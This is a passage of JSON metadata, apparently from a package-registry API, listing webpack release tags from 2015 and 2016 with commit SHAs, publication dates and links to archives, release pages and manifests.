itHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/w